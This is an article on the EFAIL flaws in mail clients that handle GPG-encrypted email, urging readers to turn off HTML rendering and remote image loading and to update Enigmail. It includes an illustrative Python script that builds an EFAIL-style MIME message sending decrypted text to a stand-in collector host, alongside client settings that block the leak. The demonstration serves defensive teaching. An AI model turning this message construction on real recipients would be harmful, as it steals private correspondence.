New GPG Security Recommendations Help to Assuage Concerns of Vulnerabilities

Back in May, the technical paper describing the EFAIL attacks led its authors, and shortly afterwards the Electronic Frontier Foundation, to advise users to stop decrypting email inside their mail clients, which in practice meant disabling GNU Privacy Guard (GPG) plugins. As with many open-source tools from GNU developers, GPG is widely used by those who run GNU/Linux on a desktop or laptop, and that made the paper rather concerning.

The Electronic Frontier Foundation has also raised concerns during the last month or so about the EFAIL vulnerabilities, which affect mail clients that handle GPG-encrypted messages rather than GPG itself, and this reminded many Linux security experts of the views expressed in the paper. A few GNU/Linux specialists went so far as to suggest that encrypted email can never be considered truly safe.

Fortunately, open-source experts have since released further recommendations that should sit better with those who rely on GPG tools to send encrypted email to other GNU/Linux users. As early as Thursday, experts were stating that the real cause of these vulnerabilities is any mail client that renders HTML, loads images automatically or fetches remote media without asking permission. The problem, however, is that many users have apparently not yet acted on those recommendations.

Enigmail, a popular GPG plugin designed to work with Thunderbird, received an update shortly after the EFAIL report was released to the public. As of today, June 9, many users who run Thunderbird on GNU/Linux have yet to install that update, even though it is nearly a month old. Because plugin updates do not necessarily arrive together with repository package updates, users on Debian or Ubuntu who are current with every package from early June may still be at risk unless they have taken the time to update the plugin manually.

The latest list of recommendations states that disabling HTML rendering and automatic image loading defeats most of the vulnerabilities, which are not actually in the GPG package itself. Interestingly enough, Enigmail's developers now make the same recommendation, since encryption combined with HTML rendering turned off makes for a much more secure email experience.
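To make the recommendation concrete, here is an added illustration (written for this article, not taken from the EFAIL paper, from Enigmail or from any mail client's code) of why HTML rendering and automatic remote loading are the problem. An attacker who has captured one of the victim's encrypted messages wraps it between an unclosed `<img src="` prefix and a closing `">` suffix as three MIME parts. A client that decrypts the PGP part in place, concatenates the parts into one HTML document and fetches remote images automatically will send the decrypted text to the attacker's server as part of the image URL. The "encryption" here is a labelled base64 stand-in so the script runs offline; it is not a cipher and says nothing about GnuPG's own cryptography. The collector URL, addresses and message text are constructed sample data.

```python
"""Simulated EFAIL-style exfiltration against a toy mail client.

Added example, not code from the article or from any real mail client.
The leak requires the CLIENT to (a) decrypt the PGP part in place,
(b) render all parts as one HTML document and (c) auto-load remote images.
Each of the three hardening switches below breaks the chain on its own.
"""
import base64
import re
from email import policy
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.parser import BytesParser

# Constructed sample plaintext that the attacker wants to recover.
SECRET_PLAINTEXT = "Meeting moved to Friday. Wire code: 4471-ALPHA"

ARMOR_RE = re.compile(
    r"-----BEGIN PGP MESSAGE-----\s*(.*?)\s*-----END PGP MESSAGE-----", re.S
)
# Simplified stand-in for the HTML engine: every src="..." on an <img> tag.
IMG_SRC_RE = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*"([^"]*)"', re.I | re.S)


def fake_encrypt(plaintext: str) -> str:
    """Stand-in for `gpg --encrypt --armor`: base64 inside PGP-looking armor.
    NOT a cipher; it only exists so the example runs offline."""
    body = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return f"-----BEGIN PGP MESSAGE-----\n\n{body}\n-----END PGP MESSAGE-----\n"


def fake_decrypt(armored: str) -> str:
    """Stand-in for `gpg --decrypt` on the armored block."""
    match = ARMOR_RE.search(armored)
    if match is None:
        raise ValueError("no PGP armor found")
    return base64.b64decode(match.group(1)).decode("utf-8")


def build_attacker_message(captured_ciphertext: str, collector_url: str) -> bytes:
    """Three MIME parts: an HTML prefix whose src quote is left open, the
    victim's captured ciphertext, and an HTML suffix that closes the tag."""
    outer = MIMEMultipart("mixed")
    outer["From"] = "attacker@example.invalid"   # constructed
    outer["To"] = "victim@example.invalid"       # constructed
    outer["Subject"] = "Re: schedule"
    outer.attach(MIMEText(f'<img src="{collector_url}?', "html"))  # quote left open
    outer.attach(MIMEText(captured_ciphertext, "plain"))           # captured ciphertext
    outer.attach(MIMEText('">', "html"))                            # closes quote and tag
    return outer.as_bytes()


def leaked_urls(raw_message: bytes, html_enabled: bool = True,
                load_remote: bool = True, isolate_parts: bool = False) -> list:
    """Simulate the client and return the remote URLs it would fetch.

    Defaults model the vulnerable behaviour. Any one of
    html_enabled=False (plain-text view), load_remote=False (no remote
    content) or isolate_parts=True (each decrypted part rendered as its own
    document, never spliced into attacker-supplied HTML) stops the leak.
    """
    msg = BytesParser(policy=policy.default).parsebytes(raw_message)
    documents, combined = [], ""
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        charset = part.get_content_charset() or "us-ascii"
        text = part.get_payload(decode=True).decode(charset)
        if ARMOR_RE.search(text):
            text = fake_decrypt(text)          # client decrypts in place
        if isolate_parts:
            documents.append(text)
        else:
            combined += text                   # attacker HTML + plaintext spliced together
    if not isolate_parts:
        documents.append(combined)
    if not html_enabled:
        return []                              # tags shown literally, nothing fetched
    urls = [u for doc in documents for u in IMG_SRC_RE.findall(doc)]
    if not load_remote:
        urls = [u for u in urls if not u.lower().startswith(("http://", "https://"))]
    return urls


if __name__ == "__main__":
    ciphertext = fake_encrypt(SECRET_PLAINTEXT)
    raw = build_attacker_message(ciphertext, "http://collector.example/")
    print("vulnerable client fetches:", leaked_urls(raw))
    print("plain-text view fetches:  ", leaked_urls(raw, html_enabled=False))
    print("no remote content fetches:", leaked_urls(raw, load_remote=False))
    print("isolated parts fetch:     ", leaked_urls(raw, isolate_parts=True))
```

Running the script shows the vulnerable configuration fetching a single URL whose query string is the decrypted plaintext, while each of the three hardened configurations fetches nothing. In Thunderbird the first two switches correspond to View > Message Body As > Plain Text and to leaving remote content blocked; the third is the kind of fix a plugin such as Enigmail has to ship, which is why installing the update matters even after the client settings are tightened.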

Interestingly, since an attack of this kind has to be aimed at a specific recipient and a specific captured message, a greater volume of encrypted email on the Internet would raise the cost of mass interception. It would not, by itself, stop a targeted attack against a client that still renders remote content, which is why the client-side recommendations above still matter.

John Rendace
John is a GNU/Linux expert with a hobbyist's background in C/C++, Web development, storage and file system technologies. In his free time, he maintains custom and vintage PC hardware. He's been compiling his own software from source since the DOS days and still prefers using the command line all these years later.